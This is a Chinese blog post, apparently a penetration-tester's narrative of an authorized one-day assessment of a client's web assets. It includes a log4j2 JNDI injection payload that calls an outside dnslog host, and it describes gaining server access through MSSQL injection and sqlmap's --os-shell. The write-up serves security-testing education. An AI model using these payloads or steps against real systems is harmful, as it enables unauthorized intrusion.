记一次安服仔的逆袭 | 实战

本文作者:七七七(首次投稿,奖励信安之路知识星球体验卡,免费注册成长平台和内部Wiki)

按照惯例,每次护网开打的前几天,业务都会带着我们上门给甲方爸爸做安全服务。这次不知道是不是业务喝酒喝多了,居然跟甲方爸爸打包票能够找出大问题,而且就给我一天的时间,这不是为难我胖虎吗.jpg。

既然无力反抗,就只好躺平了。

首先看来看客户给的资产,嗯下面有清清楚楚的 8 个 url: 

图片

虽然不全,但至少给了几个 ip,能够加快我们信息收集的速度。先打一套信息收集组合拳, oneforall、fofa、quike等等,整理完资产最后成果如下。

图片

但我看到 xxOA 的时候我的心情是愉悦的,想着最近的 log4j2 心想能够交差了,这不有手…,呸有工具就行。

先看 OA,拿出大佬的 seeyou-GUi 工具一顿操作,然而并没有什么用。可能是开发打过补丁了。

开始测试 log4j2, 被动扫描开启,检测 log4j2,没有出现我预期的情况,难道也被修复了吗?

图片

不信邪的我开始手工测试,登录框插入 poc ${jndi:ldap://xxx.dnslog.cn/f3qetn} ,静待回显。

可惜 dnslog 毫无反应,换 ceye、burpcollaborator.net、xray 反连平台利用绕过语句继续测试。仍然没有没有回显,那就换下一个站,weblogic 是 10.3.6 的,工具没有利用成功。

tomcat 也没有弱口令,好吧不能偷懒了。

只能一个个站的去测试,目录爆破、暴力破解、burp+xray 联动、工具扫描。直到下午 3 点多,才测出两个小漏洞,开始思考以往看过的文章,对我来讲无非三个思路:

1、续收集资产 

2、寻找 js 接口 

3、弱口令突破。

但 1 和 3 这两种方法之前已经投入了比较多的时间,个人也不想继续了,寻找 js 接口的操作已经看过很多文章但并没有在实战中真正用到,不如趁着这次机会实践一下。

根据以往的经验,aspx 与 php 的网站的漏洞会比 jsp 网站多。那就先从 aspx 开始。

看了两个站的 js 以后,还是没有什么收获,突然一个 html 源码的 test() 函数让我觉得有点希望

图片

已知是 json 格式,那就尝试一下,运气好,提示 id 参数未传入

图片

xray 跑出一个 mssql 报错注入

图片

sqlmap 检测可以 –os-shell,sqlmap 检测可以 –os-shell 这里算是拿下一台服务器权限了。可以交差了。

想知道执行 –os-shell 的原理吗?可以参加《实战训练 | 从数据库功能到操作系统权限》

发表评论

登录后才能评论
网站客服
网站客服
申请收录 侵权处理
分享本页
返回顶部